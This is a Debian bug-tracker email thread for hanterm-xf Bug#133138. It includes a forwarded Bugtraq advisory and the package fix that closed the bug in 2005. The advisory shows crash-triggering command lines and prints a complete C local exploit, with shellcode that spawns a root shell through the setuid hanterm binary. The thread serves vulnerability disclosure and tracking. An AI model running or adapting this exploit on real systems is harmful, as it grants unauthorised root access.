Your message dated Fri, 18 Mar 2005 01:02:14 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
Received: (at submit) by bugs.debian.org; 9 Feb 2002 20:58:44 +0000
>From [EMAIL PROTECTED] Sat Feb 09 14:58:44 2002
Return-path: <[EMAIL PROTECTED]>
Received: from smtp02.mrf.mail.rcn.net [207.172.4.61] 
        by master.debian.org with esmtp (Exim 3.12 1 (Debian))
        id 16Zea4-0007wx-00; Sat, 09 Feb 2002 14:58:44 -0600
Received: from 209-6-22-177.c3-0.smr-ubr1.sbo-smr.ma.cable.rcn.com 
([209.6.22.177] helo=mizar.alcor.net)
        by smtp02.mrf.mail.rcn.net with esmtp (Exim 3.33 #10)
        id 16Zea4-0001Z2-00
        for [EMAIL PROTECTED]; Sat, 09 Feb 2002 15:58:44 -0500
Received: from mdz by mizar.alcor.net with local (Exim 3.34 #1 (Debian))
        id 16Zea0-0007Ks-00
        for <[EMAIL PROTECTED]>; Sat, 09 Feb 2002 15:58:40 -0500
Date: Sat, 9 Feb 2002 15:58:40 -0500
From: Matt Zimmerman <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: [EMAIL PROTECTED]: Overflow Vulnerabilities in hanterm]
Message-ID: <[EMAIL PROTECTED]>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.3.27i
X-Debbugs-CC: [EMAIL PROTECTED]
Sender: Matt Zimmerman <[EMAIL PROTECTED]>
Delivered-To: [EMAIL PROTECTED]

Package: hanterm
Severity: grave
Tags: security potato woody sid

I was able to reproduce this segfault with hanterm 1:3.3.1p18-6 in unstable
and 1:3.3.1p17-5.1 in stable.  I was not able to crash hanterm-classic
3.1.6rc2-3 in unstable.

----- Forwarded message from xperc <[EMAIL PROTECTED]> -----

Date: 7 Feb 2002 10:33:27 -0000
From: xperc <[EMAIL PROTECTED]>
To: bugtraq@securityfocus.com
Subject: Overflow Vulnerabilities in hanterm



Hi,I'm xperc.

  hanterm is Hangul terminal for X. it is based on the 
xterm in XFree86. The hanterm binary is default 
installed with setuid root permissions for TurboLinux 
Server 6.5. but contains insecure code with allows 
unprivileged local users to obtain root access on the 
local system.

$which hanterm
/usr/bin/X11/hanterm
$ls -l /usr/bin/X11/hanterm
-rws--x--x      1       root    root 166100  03 13 
2001 /usr/bin/X11/hanterm*
$rpm -qf /usr/bin/X11/hanterm
hanterm-xf-p18-3.3-6
$hanterm -fn `perl -e 'print "a"x100'`
Segmentation fault
$hanterm -hfb `perl -e 'print "a"x8000'`
Segmentation fault
$hanterm -hfn `perl -e 'print "a"x8000'`
Segmentation fault
...etc

/* hanterm_exp.c
 *
 * local exploit for hanterm
 *  .. tested in TurboLinux Server 6.5 (Japan)              
 *
 * thanks my Japanese friend kaju(kaijyu)
 * and Japanese hacker UNYUN.
 *
 *                  by [EMAIL PROTECTED]
 *                         2002/02/07
 */

#include <stdio.h>

#define NOP             0x90
#define MAXBUF          88
#define RETOFS          84
#define SHELL_OFS       22
#define ESP_OFS         -0xe38  

unsigned int get_esp()
{
        __asm__("mov %esp,%eax");
}

int main()
{
        static char shellcode[]={
            0x31,0xc0,0x31,0xdb,0xb0,0x17,0xcd,0x80,
            
0x31,0xc0,0x31,0xdb,0xb0,0x2e,0xcd,0x80,
            0xeb,0x18,0x5e,0x89,0x76,0x08,0x31,0xc0,
            
0x88,0x46,0x07,0x89,0x46,0x0c,0xb0,0x0b,
            0x89,0xf3,0x8d,0x4e,0x08,0x8d,0x56,0x0c,
            0xcd,0x80,0xe8,0xe3,0xff,0xff,0xff,0x2f,
            0x62,0x69,0x6e,0x2f,0x73,0x68,0x00
        }; 
        unsigned int retadr;
        char buf[MAXBUF];
        int i;
        
        memset(buf,NOP,MAXBUF);

        retadr=get_esp()+ESP_OFS;
        printf("Jumping address = %p\n",retadr);

        for(i=RETOFS-32;i<RETOFS+32;i+=4){
                buf[i]  =retadr&0xff;
                buf[i+1]=(retadr>>8)&0xff;
                buf[i+2]=(retadr>>16)&0xff;
                buf[i+3]=(retadr>>24)&0xff;
        }
        strncpy(buf+SHELL_OFS,shellcode,strlen
(shellcode));
        //buf[MAXBUF-1]='\0';       faint!:-(
        execl("/usr/bin/X11/hanterm","hanterm","-
fn",buf,(char *)0);
}

----- End forwarded message -----

-- 
 - mdz

---------------------------------------
Received: (at 133138-close) by bugs.debian.org; 18 Mar 2005 06:36:24 +0000
>From [EMAIL PROTECTED] Thu Mar 17 22:36:24 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
        by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
        id 1DCB5r-0001cr-00; Thu, 17 Mar 2005 22:36:23 -0800
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
        id 1DCAYo-0006l1-00; Fri, 18 Mar 2005 01:02:14 -0500
From: Andrew Pollock <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#133138: fixed in hanterm-xf 1:3.3.1p18-9
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Fri, 18 Mar 2005 01:02:14 -0500
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02 
        (1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER 
        autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level: 
X-CrossAssassin-Score: 2

Source: hanterm-xf
Source-Version: 1:3.3.1p18-9

We believe that the bug you reported is fixed in the latest version of
hanterm-xf, which is due to be installed in the Debian FTP archive:

hanterm-xf_3.3.1p18-9.diff.gz
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.diff.gz
hanterm-xf_3.3.1p18-9.dsc
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9.dsc
hanterm-xf_3.3.1p18-9_i386.deb
  to pool/main/h/hanterm-xf/hanterm-xf_3.3.1p18-9_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Andrew Pollock <[EMAIL PROTECTED]> (supplier of updated hanterm-xf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Fri, 18 Mar 2005 16:37:26 +1100
Source: hanterm-xf
Binary: hanterm-xf
Architecture: source i386
Version: 1:3.3.1p18-9
Distribution: unstable
Urgency: low
Maintainer: Debian QA Group <[EMAIL PROTECTED]>
Changed-By: Andrew Pollock <[EMAIL PROTECTED]>
Description: 
 hanterm-xf - X terminal emulator with Hangul support
Closes: 118106 133138
Changes: 
 hanterm-xf (1:3.3.1p18-9) unstable; urgency=low
 .
   * QA Group upload orphaning this package
   * Incorporates previous NMUs (closes: #133138, #118106)
   * debian/hanterm-xf.menu: quoted Command:, Section: and Needs:
   * debian/hanterm-xf.1x: changed 1X to 1x in .TH macro
   * debian/control: version build-dependency on debhelper
Files: 
 b46a7ac2de89070747814d51fbab3ba8 639 x11 optional hanterm-xf_3.3.1p18-9.dsc
 333fc460afda063afc5e3402b23bbb2c 10630 x11 optional 
hanterm-xf_3.3.1p18-9.diff.gz
 3c06c28d2c7af810ec068b03c7baf240 116504 x11 optional 
hanterm-xf_3.3.1p18-9_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFCOmtZIblXXKfZFgIRAlQCAKDIyUROnM0lJXzLSl/EPu/Hb6N+dgCg1gLP
52Yc4podMt4ng+hDFuU6zGA=
=B7q1
-----END PGP SIGNATURE-----


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Reply via email to